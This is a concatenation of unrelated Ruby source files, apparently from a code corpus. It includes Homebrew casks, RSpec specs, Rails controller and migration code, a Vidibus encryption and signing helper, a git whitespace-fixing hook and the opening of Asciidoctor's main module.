expect(User.authorize_user("")).to be_nil
end
it "returns nil with admin userid" do
expect(User.authorize_user("admin")).to be_nil
end
end
end
| 33.889091 | 112 | 0.620098 |
abf4c55fde61ec6066efe4aef4234277ff62b7a0 | 578 | cask 'discord' do
version '0.0.239'
sha256 'a4a262322e98785273b5774ebfb054d89f0e8170be8bde55f086596f4d32191c'
url "https://cdn.discordapp.com/apps/osx/#{version}/Discord.dmg"
name 'Discord'
homepage 'https://discordapp.com'
license :gratis
app 'Discord.app'
zap delete: [
'~/Library/Application Support/com.hnc.Discord.ShipIt',
'~/Library/Saved Application State/com.hnc.Discord.savedState',
'~/Library/Caches/com.hnc.Discord',
'~/Library/Preferences/com.hnc.Discord.plist',
]
end
| 30.421053 | 79 | 0.648789 |
bb936b44c51d28a15d431b5d5dd8eef95bccaa5a | 647 | cask 'futuniuniu' do
version '10.4.642_202004131013'
sha256 'f49aa27c4bdd0ae7f395e04e3539c713b97de871a0bd089eafd870d3ac5804a6'
# software-file-1251001049.file.myqcloud.com/ was verified as official when first introduced to the cask
url "https://software-file-1251001049.file.myqcloud.com/FTNNForMac_#{version}_website.dmg"
appcast 'https://www.futu5.com/tools'
name 'FutuNiuniu'
name '富途牛牛'
homepage 'https://hk.futu5.com/'
# Renamed for consistency: app name is different in the Finder and in a shell.
# Original discussion: https://github.com/Homebrew/homebrew-cask/pull/7435
app 'FutuNiuniu.app', target: '富途牛牛.app'
end
| 40.4375 | 106 | 0.769706 |
4ad2ffacb08ed91d39ac21a31ca421b4812c61e6 | 693 | #
# TeNOR - VNF Provisioning
#
# Copyright 2014-2016 i2CAT Foundation, Portugal Telecom Inovação
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative 'vnf'
require_relative 'scaling'
| 34.65 | 74 | 0.76912 |
110f8c331ea5f8177c4d1c74532caa1afdc1a2fb | 495 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_07_01
module Models
#
# Defines values for PcError
#
module PcError
InternalError = "InternalError"
AgentStopped = "AgentStopped"
CaptureFailed = "CaptureFailed"
LocalFileFailed = "LocalFileFailed"
StorageFailed = "StorageFailed"
end
end
end
| 24.75 | 70 | 0.70101 |
f86547660e385bbb1dbd2ec765e4fc277cc27779 | 259 | module CollectionFilters
# Rails engine wiring: isolates the CollectionFilters namespace and
# points the host app's generators at RSpec / factory_bot defaults.
class Engine < ::Rails::Engine
  isolate_namespace CollectionFilters

  config.generators do |g|
    g.test_framework :rspec
    g.fixture_replacement :factory_bot
    g.factory_bot dir: 'spec/factories'
  end
end
end
| 21.583333 | 41 | 0.718147 |
21e9ae73ed3e8fab4bc83ae07ee3e8bad2362e03 | 5,487 | module Vidibus
module Secure
# Base error class for this library.
class Error < StandardError; end
# Raised when a required secret key is missing.
class KeyError < Error; end
# Raised when caller-supplied input has the wrong shape (e.g. params
# that are not a Hash in sign_request).
class InputError < Error; end
class << self
# Default option hashes for #random, #sign, and #crypt; built once and
# memoized for the lifetime of the process.
def settings
  @settings ||= {
    random: { length: 50, encoding: :base64 },
    sign:   { algorithm: "SHA256", encoding: :hex },
    crypt:  { algorithm: "AES-256-CBC", encoding: :base64 }
  }
end
# Returns a cryptographically random string via Ruby's SecureRandom.
#
# Options:
#   :length    Length of string to generate (default 50)
#   :encoding  Encoding of string; :hex or :base64 (default :base64)
#
# Keep in mind that a hexadecimal string is less secure than a base64
# encoded string with the same length!
def random(options = {})
  opts = settings[:random].merge(options)
  len = opts[:length]
  generated = SecureRandom.public_send(opts[:encoding], len)
  generated[0, len]
end
# Returns the HMAC signature of +data+ computed with +key+, encoded
# according to the :sign settings (algorithm and output encoding both
# overridable via +options+).
def sign(data, key, options = {})
  raise KeyError, "Please provide a secret key to sign data with." unless key
  opts = settings[:sign].merge(options)
  raw = OpenSSL::HMAC.digest(OpenSSL::Digest.new(opts[:algorithm]), key, data)
  encode(raw, opts)
end
# Encrypts given data with given key. Non-string data is serialized to
# JSON first; the ciphertext (from the private crypt helper) is then
# encoded per the :crypt settings.
def encrypt(data, key, options = {})
  raise KeyError.new("Please provide a secret key to encrypt data with.") unless key
  options = settings[:crypt].merge(options)
  unless data.is_a?(String)
    data = JSON.generate(data)
  end
  encrypted_data = crypt(:encrypt, data, key, options)
  encode(encrypted_data, options)
end

# Decrypts given data with given key: decode, then reverse crypt.
# Plaintext that parses as JSON is returned as the parsed structure,
# otherwise as the raw string. If decryption yields nothing falsy the
# original input is returned unchanged.
def decrypt(data, key, options = {})
  raise KeyError.new("Please provide a secret key to decrypt data with.") unless key
  options = settings[:crypt].merge(options)
  decoded_data = decode(data, options)
  decrypted_data = crypt(:decrypt, decoded_data, key, options)
  return data unless decrypted_data
  begin
    JSON.parse(decrypted_data)
  rescue JSON::ParserError
    decrypted_data
  end
end
# Signs request.
def sign_request(verb, path, params, key, signature_param = nil)
default_signature_param = :sign
params_given = !!params
raise InputError.new("Given params is not a Hash.") if params_given and !params.is_a?(Hash)
params = {} unless params_given
signature_param ||= (params_given and params.keys.first.is_a?(String)) ? default_signature_param.to_s : default_signature_param
uri = URI.parse(path)
path_params = Rack::Utils.parse_nested_query(uri.query)
uri.query = nil
_verb = verb.to_s.downcase
_params = (params.merge(path_params)).except(signature_param.to_s, signature_param.to_s.to_sym)
signature_string = [
_verb,
uri.to_s.gsub(/\/+$/, ""),
_params.any? ? params_identifier(_params) : ""
].join("|")
signature = sign(signature_string, key)
if %w[post put].include?(_verb) or (params_given and path_params.empty?)
params[signature_param] = signature
else
unless path.gsub!(/(#{signature_param}=)[^&]+/, "\\1#{signature}")
glue = path.match(/\?/) ? "&" : "?"
path << "#{glue}#{signature_param}=#{signature}"
end
end
[path, params]
end
# Verifies that given request is valid.
def verify_request(verb, path, params, key, signature_param = nil)
params ||= {}
_path = path.dup
_params = params.dup
sign_request(verb, _path, _params, key, signature_param)
return (path == _path and params == _params)
end
protected
def crypt(cipher_method, data, key, options = {})
return unless data && data != ''
cipher = OpenSSL::Cipher::Cipher.new(options[:algorithm])
digest = OpenSSL::Digest::SHA512.new(key).digest
cipher.send(cipher_method)
cipher.pkcs5_keyivgen(digest)
result = cipher.update(data)
result << cipher.final
end
def encode(data, options = {})
return unless data
if options[:encoding] == :hex
data.unpack("H*").join
elsif options[:encoding] == :base64
[data].pack("m*")
end
end
def decode(data, options = {})
return unless data
if options[:encoding] == :hex
[data].pack("H*")
elsif options[:encoding] == :base64
data.unpack("m*").join
end
end
# Returns an identifier string from given params input.
#
# Example:
# {:some=>{:nested=>{:really=>["serious", "stuff"]}, :are=>"params"}}
# # => 1:some:2:are:params|2:nested:3:really:4:serious:|4:stuff:
#
def params_identifier(params, level = 1)
array = []
for key, value in params
if value.is_a?(Array) or value.is_a?(Hash)
value = params_identifier(value, level + 1)
end
array << "#{level}:#{key}:#{value}"
end
array.sort.join("|")
end
end
end
end
| 33.87037 | 135 | 0.585566 |
# Registers the Storenvy OAuth strategy in the OmniAuth middleware stack.
# Credentials come from the environment so they stay out of source control.
Rails.application.config.middleware.use OmniAuth::Builder do
  provider :storenvy, ENV['STORENVY_KEY'], ENV['STORENVY_SECRET'] #, :scope => 'store_write user store_read'
end
require_relative 'enumerable_enumeratorized'

# Shared examples for Enumerable#find / Enumerable#detect. The including
# spec file sets @method to :find or :detect before running these.
describe :enumerable_find, shared: true do
  # #detect and #find are aliases, so we only need one function
  before :each do
    ScratchPad.record []
    @elements = [2, 4, 6, 8, 10]
    @numerous = EnumerableSpecs::Numerous.new(*@elements)
    @empty = []
  end
  it "passes each entry in enum to block while block when block is false" do
    visited_elements = []
    @numerous.send(@method) do |element|
      visited_elements << element
      false
    end
    visited_elements.should == @elements
  end
  it "returns nil when the block is false and there is no ifnone proc given" do
    @numerous.send(@method) {|e| false }.should == nil
  end
  it "returns the first element for which the block is not false" do
    @elements.each do |element|
      @numerous.send(@method) {|e| e > element - 1 }.should == element
    end
  end
  it "returns the value of the ifnone proc if the block is false" do
    fail_proc = -> { "cheeseburgers" }
    @numerous.send(@method, fail_proc) {|e| false }.should == "cheeseburgers"
  end
  it "doesn't call the ifnone proc if an element is found" do
    # The proc raises, so reaching == 2 proves it was never invoked.
    fail_proc = -> { raise "This shouldn't have been called" }
    @numerous.send(@method, fail_proc) {|e| e == @elements.first }.should == 2
  end
  it "calls the ifnone proc only once when the block is false" do
    times = 0
    fail_proc = -> { times += 1; raise if times > 1; "cheeseburgers" }
    @numerous.send(@method, fail_proc) {|e| false }.should == "cheeseburgers"
  end
  it "calls the ifnone proc when there are no elements" do
    fail_proc = -> { "yay" }
    @empty.send(@method, fail_proc) {|e| true}.should == "yay"
  end
  it "ignores the ifnone argument when nil" do
    @numerous.send(@method, nil) {|e| false }.should == nil
  end
  it "passes through the values yielded by #each_with_index" do
    [:a, :b].each_with_index.send(@method) { |x, i| ScratchPad << [x, i]; nil }
    ScratchPad.recorded.should == [[:a, 0], [:b, 1]]
  end
  it "returns an enumerator when no block given" do
    @numerous.send(@method).should be_an_instance_of(Enumerator)
  end
  it "passes the ifnone proc to the enumerator" do
    times = 0
    fail_proc = -> { times += 1; raise if times > 1; "cheeseburgers" }
    @numerous.send(@method, fail_proc).each {|e| false }.should == "cheeseburgers"
  end
  it "gathers whole arrays as elements when each yields multiple" do
    multi = EnumerableSpecs::YieldsMulti.new
    multi.send(@method) {|e| e == [1, 2] }.should == [1, 2]
  end
  it_should_behave_like :enumerable_enumeratorized_with_unknown_size
end
| 33.397436 | 82 | 0.663724 |
# Adds a unique, indexed slug column used for friendly URLs.
#
# NOTE(review): the class name mentions "Users" but the migration alters the
# :artists table — presumably the model was renamed at some point; confirm
# the intent before relying on the name.
class AddSlugsToUsers < ActiveRecord::Migration
  def change
    add_column :artists, :slug, :string
    add_index :artists, :slug, unique: true
  end
end
| 22.142857 | 47 | 0.729032 |
1ce5ba6b5e367a80cb4cc082f21a3f67457b7800 | 5,645 | #!/usr/bin/env ruby
# Usage:
# auto-style.rb [repo_path] [args...]
require 'shellwords'
require 'tmpdir'
ENV['LC_ALL'] = 'C'
# Thin wrapper around the `git` CLI for a pushed revision range
# (oldrev..newrev on the given branch). Collects the pushed commits on
# construction so callers can ask which paths and lines they touched.
class Git
  # Number of commits in the pushed range (used below as a clone depth hint).
  attr_reader :depth
  def initialize(oldrev, newrev, branch)
    @oldrev = oldrev
    @newrev = newrev
    @branch = branch
    with_clean_env do
      # Map of commit sha => subject line for every commit in the range.
      @revs = {}
      IO.popen(['git', 'log', '--format=%H %s', "#{@oldrev}..#{@newrev}"]) do |f|
        f.each do |line|
          line.chomp!
          rev, subj = line.split(' ', 2)
          @revs[rev] = subj
        end
      end
      @depth = @revs.size
    end
  end
  # ["foo/bar.c", "baz.h", ...]
  # Paths changed anywhere in the oldrev..newrev range.
  def updated_paths
    with_clean_env do
      IO.popen(['git', 'diff', '--name-only', @oldrev, @newrev], &:readlines).each(&:chomp!)
    end
  end
  # [0, 1, 4, ...]
  # Zero-based indexes of lines in `file` whose last change (per `git blame`)
  # came from one of the pushed commits. Commits whose subject starts with
  # "Revert " are excluded from the match.
  def updated_lines(file)
    lines = []
    revs = @revs.filter_map {|rev, subj| rev unless subj.start_with?("Revert ")}
    revs_pattern = /\A(?:#{revs.join('|')}) /
    with_clean_env { IO.popen(['git', 'blame', '-l', '--', file], &:readlines) }.each_with_index do |line, index|
      if revs_pattern =~ line
        lines << index
      end
    end
    lines
  end
  # Stages the given files, commits them with `log` as the message, and
  # pushes the branch to origin.
  def commit(log, *files)
    git('add', *files)
    git('commit', '-m', log)
    git('push', 'origin', @branch)
  end
  private
  # Runs a git command via the shell, aborting the whole hook on failure.
  def git(*args)
    cmd = ['git', *args].shelljoin
    unless with_clean_env { system(cmd) }
      abort "Failed to run: #{cmd}"
    end
  end
  # Clears GIT_DIR for the duration of the block so git commands operate on
  # the current working directory rather than the hook's repository.
  def with_clean_env
    git_dir = ENV.delete('GIT_DIR') # this overcomes '-C' or pwd
    yield
  ensure
    ENV['GIT_DIR'] = git_dir if git_dir
  end
end
# Standard libraries maintained upstream as default gems; their files are
# excluded from auto-styling via IGNORED_FILES below.
DEFAULT_GEM_LIBS = %w[
  bundler
  cmath
  csv
  e2mmap
  fileutils
  forwardable
  ipaddr
  irb
  logger
  matrix
  mutex_m
  ostruct
  prime
  rdoc
  rexml
  rss
  scanf
  shell
  sync
  thwait
  tracer
  webrick
]
# Default gems implemented as C extensions; their ext/ and test/ trees are
# excluded as well.
DEFAULT_GEM_EXTS = %w[
  bigdecimal
  date
  dbm
  etc
  fcntl
  fiddle
  gdbm
  io/console
  json
  openssl
  psych
  racc
  sdbm
  stringio
  strscan
  zlib
]
# Path patterns this hook must never rewrite: default gems maintained
# upstream, vendored code, files with their own C style, and legal texts.
IGNORED_FILES = [
  # default gems whose master is GitHub
  %r{\Abin/(?!erb)\w+\z},
  *(DEFAULT_GEM_LIBS + DEFAULT_GEM_EXTS).flat_map { |lib|
    [
      %r{\Alib/#{lib}/},
      %r{\Alib/#{lib}\.gemspec\z},
      %r{\Alib/#{lib}\.rb\z},
      %r{\Atest/#{lib}/},
    ]
  },
  *DEFAULT_GEM_EXTS.flat_map { |ext|
    [
      %r{\Aext/#{ext}/},
      %r{\Atest/#{ext}/},
    ]
  },
  # vendoring (ccan)
  %r{\Accan/},
  # vendoring (onigmo)
  %r{\Aenc/},
  %r{\Ainclude/ruby/onigmo\.h\z},
  %r{\Areg.+\.(c|h)\z},
  # explicit or implicit `c-file-style: "linux"`
  %r{\Aaddr2line\.c\z},
  %r{\Amissing/},
  %r{\Astrftime\.c\z},
  %r{\Avsnprintf\.c\z},
  # to respect the original statements of licenses
  %r{\ALEGAL\z},
]
# Hook entry point. ARGV is the repository path followed by
# (oldrev, newrev, refname) triples, one per pushed ref.
repo_path, *rest = ARGV
rest.each_slice(3).map do |oldrev, newrev, refname|
  branch = IO.popen({ 'GIT_DIR' => repo_path }, ['git', 'rev-parse', '--symbolic', '--abbrev-ref', refname], &:read).strip
  next if branch != 'master' # Stable branches are on svn, and for consistency we should not make a git-specific commit.
  vcs = Git.new(oldrev, newrev, branch)
  Dir.mktmpdir do |workdir|
    # Clone just deep enough to cover the pushed commits plus one parent.
    depth = vcs.depth + 1
    system "git clone --depth=#{depth} --branch=#{branch} file:///#{repo_path} #{workdir}"
    Dir.chdir(workdir)
    paths = vcs.updated_paths
    # Keep only source-ish files: build/README files by name, or files whose
    # extension is on the whitelist; skip names starting with a digit and .bat.
    paths.select! {|l|
      /^\d/ !~ l and /\.bat\z/ !~ l and
      (/\A(?:config|[Mm]akefile|GNUmakefile|README)/ =~ File.basename(l) or
       /\A\z|\.(?:[chsy]|\d+|e?rb|tmpl|bas[eh]|z?sh|in|ma?k|def|src|trans|rdoc|ja|en|el|sed|awk|p[ly]|scm|mspec|html|)\z/ =~ File.extname(l))
    }
    files = paths.select {|n| File.file?(n) }
    files.reject! do |f|
      IGNORED_FILES.any? { |re| f.match(re) }
    end
    next if files.empty?
    # Which kinds of fix-up were applied overall (for the commit message).
    trailing = eofnewline = expandtab = false
    edited_files = files.select do |f|
      src = File.binread(f) rescue next
      # Ensure the file ends with a newline.
      eofnewline = eofnewline0 = true if src.sub!(/(?<!\n)\z/, "\n")
      trailing0 = false
      expandtab0 = false
      updated_lines = vcs.updated_lines(f)
      # Strip trailing whitespace, but only on lines touched by this push.
      if !updated_lines.empty?
        src.gsub!(/^.*$/).with_index do |line, lineno|
          if updated_lines.include?(lineno)
            trailing = trailing0 = true if line.sub!(/[ \t]+$/, '')
          end
          line
        end
      end
      # Tab expansion applies only to C sources, headers and insns.def.
      if !updated_lines.empty? && (f.end_with?('.c') || f.end_with?('.h') || f == 'insns.def')
        # If and only if unedited lines did not have tab indentation, prevent introducing tab indentation to the file.
        expandtab_allowed = src.each_line.with_index.all? do |line, lineno|
          updated_lines.include?(lineno) || !line.start_with?("\t")
        end
        if expandtab_allowed
          src.gsub!(/^.*$/).with_index do |line, lineno|
            if updated_lines.include?(lineno) && line.start_with?("\t") # last-committed line with hard tabs
              expandtab = expandtab0 = true
              line.sub(/\A\t+/) { |tabs| ' ' * (8 * tabs.length) }
            else
              line
            end
          end
        end
      end
      # Write back (and count as edited) only when something changed.
      if trailing0 or eofnewline0 or expandtab0
        File.binwrite(f, src)
        true
      end
    end
    unless edited_files.empty?
      msg = [('remove trailing spaces' if trailing),
             ('append newline at EOF' if eofnewline),
             ('expand tabs' if expandtab),
            ].compact
      message = "* #{msg.join(', ')}. [ci skip]"
      if expandtab
        message += "\n\nTabs were expanded because the file did not have any tab indentation in unedited lines."
        message += "\nPlease update your editor config, and use misc/expand_tabs.rb in the pre-commit hook."
      end
      vcs.commit(message, *edited_files)
    end
  end
end
| 24.543478 | 141 | 0.573605 |
class MicropostsController < ApplicationController
  before_action :logged_in_user, only: [:create, :destroy]
  before_action :correct_user, only: :destroy

  # POST /microposts — builds a micropost for the signed-in user from the
  # permitted params; re-renders the home page with an empty feed on
  # validation failure.
  def create
    @micropost = current_user.microposts.build(micropost_params)
    if @micropost.save
      flash[:success] = "Micropost created!"
      redirect_to root_url
    else
      @feed_items = []
      render 'static_pages/home'
    end
  end

  # DELETE /microposts/:id — @micropost is loaded (and ownership enforced)
  # by the correct_user filter.
  def destroy
    @micropost.destroy
    flash[:success] = "Micropost deleted"
    redirect_to request.referrer || root_url
  end

  private

  # Strong parameters: only content and picture may be mass-assigned.
  def micropost_params
    params.require(:micropost).permit(:content, :picture)
  end

  # Loads the micropost scoped to the current user and redirects home when
  # it is missing or not owned by them.
  # FIX: was `edirect_to` (typo), which raised NoMethodError (HTTP 500)
  # instead of redirecting whenever a user tried to delete a micropost
  # that was not theirs.
  def correct_user
    @micropost = current_user.microposts.find_by(id: params[:id])
    redirect_to root_url if @micropost.nil?
  end
end
1a6398de69158f8c130f3f482f66cb635e7c9386 | 53,519 | # encoding: UTF-8
RUBY_ENGINE = 'unknown' unless defined? RUBY_ENGINE
RUBY_ENGINE_OPAL = (RUBY_ENGINE == 'opal')
RUBY_ENGINE_JRUBY = (RUBY_ENGINE == 'jruby')
RUBY_MIN_VERSION_1_9 = (RUBY_VERSION >= '1.9')
RUBY_MIN_VERSION_2 = (RUBY_VERSION >= '2')
require 'set'
# NOTE RUBY_ENGINE == 'opal' conditional blocks are filtered by the Opal preprocessor
if RUBY_ENGINE == 'opal'
# NOTE asciidoctor/opal_ext is supplied by the Asciidoctor.js build
require 'asciidoctor/opal_ext'
else
autoload :Base64, 'base64'
autoload :FileUtils, 'fileutils'
autoload :OpenURI, 'open-uri'
autoload :StringScanner, 'strscan'
end
# ideally we should use require_relative instead of modifying the LOAD_PATH
$:.unshift File.dirname __FILE__
# Public: Methods for parsing AsciiDoc input files and converting documents
# using eRuby templates.
#
# AsciiDoc documents comprise a header followed by zero or more sections.
# Sections are composed of blocks of content. For example:
#
# = Doc Title
#
# == Section 1
#
# This is a paragraph block in the first section.
#
# == Section 2
#
# This section has a paragraph block and an olist block.
#
# . Item 1
# . Item 2
#
# Examples:
#
# Use built-in converter:
#
# Asciidoctor.convert_file 'sample.adoc'
#
# Use custom (Tilt-supported) templates:
#
# Asciidoctor.convert_file 'sample.adoc', :template_dir => 'path/to/templates'
#
module Asciidoctor
# alias the RUBY_ENGINE constant inside the Asciidoctor namespace
RUBY_ENGINE = ::RUBY_ENGINE
module SafeMode
# A safe mode level that disables any of the security features enforced
# by Asciidoctor (Ruby is still subject to its own restrictions).
UNSAFE = 0;
# A safe mode level that closely parallels safe mode in AsciiDoc. This value
# prevents access to files which reside outside of the parent directory of
# the source file and disables any macro other than the include::[] macro.
SAFE = 1;
# A safe mode level that disallows the document from setting attributes
# that would affect the conversion of the document, in addition to all the
# security features of SafeMode::SAFE. For instance, this level disallows
# changing the backend or the source-highlighter using an attribute defined
# in the source document. This is the most fundamental level of security
# for server-side deployments (hence the name).
SERVER = 10;
# A safe mode level that disallows the document from attempting to read
# files from the file system and including the contents of them into the
# document, in additional to all the security features of SafeMode::SERVER.
# For instance, this level disallows use of the include::[] macro and the
# embedding of binary content (data uri), stylesheets and JavaScripts
# referenced by the document.(Asciidoctor and trusted extensions may still
# be allowed to embed trusted content into the document).
#
# Since Asciidoctor is aiming for wide adoption, this level is the default
# and is recommended for server-side deployments.
SECURE = 20;
# A planned safe mode level that disallows the use of passthrough macros and
# prevents the document from setting any known attributes, in addition to all
# the security features of SafeMode::SECURE.
#
# Please note that this level is not currently implemented (and therefore not
# enforced)!
#PARANOID = 100;
end
# Flags to control compliance with the behavior of AsciiDoc
module Compliance
@keys = ::Set.new
class << self
attr :keys
end
# Defines a new compliance key and assigns an initial value.
def self.define key, value
instance_variable_set %(@#{key}), value
class << self; self; end.send :attr_accessor, key
@keys << key
nil
end
# AsciiDoc terminates paragraphs adjacent to
# block content (delimiter or block attribute list)
# This option allows this behavior to be modified
# TODO what about literal paragraph?
# Compliance value: true
define :block_terminates_paragraph, true
# AsciiDoc does not treat paragraphs labeled with a verbatim style
# (literal, listing, source, verse) as verbatim
# This options allows this behavior to be modified
# Compliance value: false
define :strict_verbatim_paragraphs, true
# NOT CURRENTLY USED
# AsciiDoc allows start and end delimiters around
# a block to be different lengths
# Enabling this option requires matching lengths
# Compliance value: false
#define :congruent_block_delimiters, true
# AsciiDoc supports both single-line and underlined
# section titles.
# This option disables the underlined variant.
# Compliance value: true
define :underline_style_section_titles, true
# Asciidoctor will unwrap the content in a preamble
# if the document has a title and no sections.
# Compliance value: false
define :unwrap_standalone_preamble, true
# AsciiDoc drops lines that contain references to missing attributes.
# This behavior is not intuitive to most writers
# Compliance value: 'drop-line'
define :attribute_missing, 'skip'
# AsciiDoc drops lines that contain an attribute unassignemnt.
# This behavior may need to be tuned depending on the circumstances.
# Compliance value: 'drop-line'
define :attribute_undefined, 'drop-line'
# Asciidoctor will allow the id, role and options to be set
# on blocks using a shorthand syntax (e.g., #idname.rolename%optionname)
# Compliance value: false
define :shorthand_property_syntax, true
# Asciidoctor will start counting at the following number
# when creating a unique id when there is a conflict
# Compliance value: 2
define :unique_id_start_index, 2
# Asciidoctor will recognize commonly-used Markdown syntax
# to the degree it does not interfere with existing
# AsciiDoc syntax and behavior.
# Compliance value: false
define :markdown_syntax, true
end
# The absolute root path of the Asciidoctor RubyGem
ROOT_PATH = ::File.dirname ::File.dirname ::File.expand_path __FILE__
# The absolute lib path of the Asciidoctor RubyGem
LIB_PATH = ::File.join ROOT_PATH, 'lib'
# The absolute data path of the Asciidoctor RubyGem
DATA_PATH = ::File.join ROOT_PATH, 'data'
# The user's home directory, as best we can determine it
# NOTE not using infix rescue for performance reasons, see: https://github.com/jruby/jruby/issues/1816
begin
USER_HOME = ::Dir.home
rescue
USER_HOME = ::ENV['HOME'] || ::Dir.pwd
end
# Flag to indicate whether encoding can be coerced to UTF-8
# _All_ input data must be force encoded to UTF-8 if Encoding.default_external is *not* UTF-8
# Addresses failures performing string operations that are reported as "invalid byte sequence in US-ASCII"
# Ruby 1.8 doesn't seem to experience this problem (perhaps because it isn't validating the encodings)
COERCE_ENCODING = !::RUBY_ENGINE_OPAL && ::RUBY_MIN_VERSION_1_9
# Flag to indicate whether encoding of external strings needs to be forced to UTF-8
FORCE_ENCODING = COERCE_ENCODING && ::Encoding.default_external != ::Encoding::UTF_8
# Byte arrays for UTF-* Byte Order Marks
# hex escape sequence used for Ruby 1.8 compatibility
BOM_BYTES_UTF_8 = "\xef\xbb\xbf".bytes.to_a
BOM_BYTES_UTF_16LE = "\xff\xfe".bytes.to_a
BOM_BYTES_UTF_16BE = "\xfe\xff".bytes.to_a
# Flag to indicate that line length should be calculated using a unicode mode hint
FORCE_UNICODE_LINE_LENGTH = !::RUBY_MIN_VERSION_1_9
# Flag to indicate whether gsub can use a Hash to map matches to replacements
SUPPORTS_GSUB_RESULT_HASH = ::RUBY_MIN_VERSION_1_9 && !::RUBY_ENGINE_OPAL
# The endline character used for output; stored in constant table as an optimization
EOL = "\n"
# The null character to use for splitting attribute values
NULL = "\0"
# String for matching tab character
TAB = "\t"
# The default document type
# Can influence markup generated by the converters
DEFAULT_DOCTYPE = 'article'
# The backend determines the format of the converted output, default to html5
DEFAULT_BACKEND = 'html5'
DEFAULT_STYLESHEET_KEYS = ['', 'DEFAULT'].to_set
DEFAULT_STYLESHEET_NAME = 'asciidoctor.css'
# Pointers to the preferred version for a given backend.
BACKEND_ALIASES = {
'html' => 'html5',
'docbook' => 'docbook5'
}
# Default page widths for calculating absolute widths
DEFAULT_PAGE_WIDTHS = {
'docbook' => 425
}
# Default extensions for the respective base backends
DEFAULT_EXTENSIONS = {
'html' => '.html',
'docbook' => '.xml',
'pdf' => '.pdf',
'epub' => '.epub',
'asciidoc' => '.adoc'
}
# Set of file extensions recognized as AsciiDoc documents (stored as a truth hash)
ASCIIDOC_EXTENSIONS = {
'.asciidoc' => true,
'.adoc' => true,
'.ad' => true,
'.asc' => true,
# TODO .txt should be deprecated
'.txt' => true
}
SECTION_LEVELS = {
'=' => 0,
'-' => 1,
'~' => 2,
'^' => 3,
'+' => 4
}
ADMONITION_STYLES = ['NOTE', 'TIP', 'IMPORTANT', 'WARNING', 'CAUTION'].to_set
PARAGRAPH_STYLES = ['comment', 'example', 'literal', 'listing', 'normal', 'pass', 'quote', 'sidebar', 'source', 'verse', 'abstract', 'partintro'].to_set
VERBATIM_STYLES = ['literal', 'listing', 'source', 'verse'].to_set
DELIMITED_BLOCKS = {
'--' => [:open, ['comment', 'example', 'literal', 'listing', 'pass', 'quote', 'sidebar', 'source', 'verse', 'admonition', 'abstract', 'partintro'].to_set],
'----' => [:listing, ['literal', 'source'].to_set],
'....' => [:literal, ['listing', 'source'].to_set],
'====' => [:example, ['admonition'].to_set],
'****' => [:sidebar, ::Set.new],
'____' => [:quote, ['verse'].to_set],
'""' => [:quote, ['verse'].to_set],
'++++' => [:pass, ['stem', 'latexmath', 'asciimath'].to_set],
'|===' => [:table, ::Set.new],
',===' => [:table, ::Set.new],
':===' => [:table, ::Set.new],
'!===' => [:table, ::Set.new],
'////' => [:comment, ::Set.new],
'```' => [:fenced_code, ::Set.new]
}
DELIMITED_BLOCK_LEADERS = DELIMITED_BLOCKS.keys.map {|key| key[0..1] }.to_set
LAYOUT_BREAK_LINES = {
'\'' => :thematic_break,
'-' => :thematic_break,
'*' => :thematic_break,
'_' => :thematic_break,
'<' => :page_break
}
#LIST_CONTEXTS = [:ulist, :olist, :dlist, :colist]
NESTABLE_LIST_CONTEXTS = [:ulist, :olist, :dlist]
# TODO validate use of explicit style name above ordered list (this list is for selecting an implicit style)
ORDERED_LIST_STYLES = [:arabic, :loweralpha, :lowerroman, :upperalpha, :upperroman] #, :lowergreek]
ORDERED_LIST_KEYWORDS = {
'loweralpha' => 'a',
'lowerroman' => 'i',
'upperalpha' => 'A',
'upperroman' => 'I'
#'lowergreek' => 'a'
#'arabic' => '1'
#'decimal' => '1'
}
LIST_CONTINUATION = '+'
# NOTE AsciiDoc Python recognizes both a preceding TAB and a space
LINE_BREAK = ' +'
LINE_CONTINUATION = ' \\'
LINE_CONTINUATION_LEGACY = ' +'
BLOCK_MATH_DELIMITERS = {
:asciimath => ['\\$', '\\$'],
:latexmath => ['\\[', '\\]'],
}
INLINE_MATH_DELIMITERS = {
:asciimath => ['\\$', '\\$'],
:latexmath => ['\\(', '\\)'],
}
# attributes which be changed within the content of the document (but not
# header) because it has semantic meaning; ex. sectnums
FLEXIBLE_ATTRIBUTES = %w(sectnums)
# A collection of regular expressions used by the parser.
#
# NOTE: The following pattern, which appears frequently, captures the
# contents between square brackets, ignoring escaped closing brackets
# (closing brackets prefixed with a backslash '\' character)
#
# Pattern: (?:\[((?:\\\]|[^\]])*?)\])
# Matches: [enclosed text here] or [enclosed [text\] here]
#
#(pseudo)module Rx
## Regular expression character classes (to ensure regexp compatibility between Ruby and JavaScript)
## CC stands for "character class", CG stands for "character class group"
# NOTE \w matches only the ASCII word characters, whereas [[:word:]] or \p{Word} matches any character in the Unicode word category.
# character classes for the Regexp engine(s) in JavaScript
if RUBY_ENGINE == 'opal'
CC_ALPHA = 'a-zA-Z'
CG_ALPHA = '[a-zA-Z]'
CC_ALNUM = 'a-zA-Z0-9'
CG_ALNUM = '[a-zA-Z0-9]'
CG_BLANK = '[ \\t]'
CC_EOL = '(?=\\n|$)'
CG_GRAPH = '[\\x21-\\x7E]' # non-blank character
CC_ALL = '[\s\S]' # any character, including newlines (alternatively, [^])
CC_WORD = 'a-zA-Z0-9_'
CG_WORD = '[a-zA-Z0-9_]'
# character classes for the Regexp engine in Ruby >= 2 (Ruby 1.9 supports \p{} but has problems w/ encoding)
elsif ::RUBY_MIN_VERSION_2
CC_ALPHA = CG_ALPHA = '\p{Alpha}'
CC_ALNUM = CG_ALNUM = '\p{Alnum}'
CC_ALL = '.'
CG_BLANK = '\p{Blank}'
CC_EOL = '$'
CG_GRAPH = '\p{Graph}'
CC_WORD = CG_WORD = '\p{Word}'
# character classes for the Regexp engine in Ruby < 2
else
CC_ALPHA = '[:alpha:]'
CG_ALPHA = '[[:alpha:]]'
CC_ALL = '.'
CC_ALNUM = '[:alnum:]'
CG_ALNUM = '[[:alnum:]]'
CG_BLANK = '[[:blank:]]'
CC_EOL = '$'
CG_GRAPH = '[[:graph:]]' # non-blank character
